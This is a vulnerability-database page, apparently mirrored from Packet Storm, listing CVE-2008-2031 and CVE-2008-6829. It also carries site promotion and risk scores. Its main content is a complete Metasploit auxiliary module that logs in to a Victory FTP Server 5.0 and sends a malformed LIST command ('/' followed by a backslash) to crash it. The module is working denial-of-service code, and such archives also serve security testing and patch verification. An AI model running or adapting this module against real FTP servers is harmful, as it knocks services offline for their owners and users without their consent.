Lucene search
K

Victory FTP Server 5.0 LIST Denial of Service

🗓️ 31 Aug 2024 00:00:00Reported by Kris Katterjohn, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 232 Views

Victory FTP Server 5.0 Denial of Service via LIST command

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-2031
24 Oct 200800:00
circl
Circl
CVE-2008-6829
24 Oct 200800:00
circl
CVE
CVE-2008-2031
30 Apr 200815:00
cve
CVE
CVE-2008-6829
8 Jun 200919:00
cve
Cvelist
CVE-2008-2031
30 Apr 200815:00
cvelist
Cvelist
CVE-2008-6829
8 Jun 200919:00
cvelist
Metasploit
Victory FTP Server 5.0 LIST DoS
9 Jan 200905:33
metasploit
NVD
CVE-2008-2031
30 Apr 200816:17
nvd
NVD
CVE-2008-6829
8 Jun 200919:30
nvd
OpenVAS
VicFTPS 'LIST' Command Remote Denial of Service Vulnerability
25 Feb 201100:00
openvas
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Ftp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Victory FTP Server 5.0 LIST DoS',  
'Description' => %q{  
The Victory FTP Server v5.0 can be brought down by sending  
a very simple LIST command  
},  
'Author' => 'kris katterjohn',  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2008-2031' ],  
[ 'CVE', '2008-6829' ],  
[ 'OSVDB', '44608' ],  
[ 'EDB', '6834' ]  
],  
'DisclosureDate' => '2008-10-24'))  
  
# They're required  
register_options([  
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ], fallbacks: ['USERNAME']),  
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ], fallbacks: ['PASSWORD'])  
])  
end  
  
def run  
return unless connect_login  
  
print_status("Sending command...")  
  
# Try to wait for a response  
resp = send_cmd(['LIST', [0x2f, 0x5c].pack('CC')])  
  
disconnect  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 25
EPSS0.70215
232